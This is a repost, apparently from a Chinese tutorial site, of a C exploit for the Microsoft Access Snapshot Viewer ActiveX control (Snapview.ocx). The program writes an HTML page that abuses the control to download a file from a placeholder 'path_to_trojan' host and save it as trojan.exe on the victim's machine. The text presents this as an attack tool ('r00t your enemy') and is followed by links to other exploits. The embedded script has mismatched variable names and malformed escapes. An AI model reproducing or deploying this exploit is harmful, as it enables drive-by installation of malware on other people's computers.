手机
当前位置:查字典教程网 >网络安全 >Exploit >Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
摘要:/*MicrosoftAccessSnapshotViewerActiveXControlExploitMs-AceesSnapShotEx...

/* Microsoft Access Snapshot Viewer ActiveX Control Exploit

Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0

Download nice binaries into an arbitrary box

Vulnerability discovered by Oliver Lavery

http://www.securityfocus.com/bid/8536/info

Remote: Yes

greetz to str0ke */ #include <stdio.h>

#include <stdlib.h>

#define Filename "Ms-Access-SnapShot.html"

FILE *File;

char data[] = "<html>n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object>n"

"<script language='javascript'>nvar arbitrary_file = 'http://path_to_trojan'n"

"var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'nattack.SnapshotPath = arbitrary_filen"

"attack.CompressedPath = destinationnattack.PrintSnapshot(arbitrary_file,destination)n"

"<script>n<html>"; int main ()

{

printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**n");

printf("**c0ded by callAX**n");

printf("**r00t your enemy .| **"); FILE *File;

char *b0fer; if ( (File = fopen(Filename,"w b")) == NULL ) {

printf("n fopen() error");

exit(1);

} b0fer = (char*)malloc(strlen(data));

memcpy(b0fer,data,sizeof(data)-1);

fwrite(b0fer, strlen(data), 1,File);

fclose(File); printf("nn" Filename " has been created.n");

return 0;

}

【Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit】相关文章:

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

ESET Smart Security 3.0.667.0 Privilege Escalation PoC

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

精品推荐
分类导航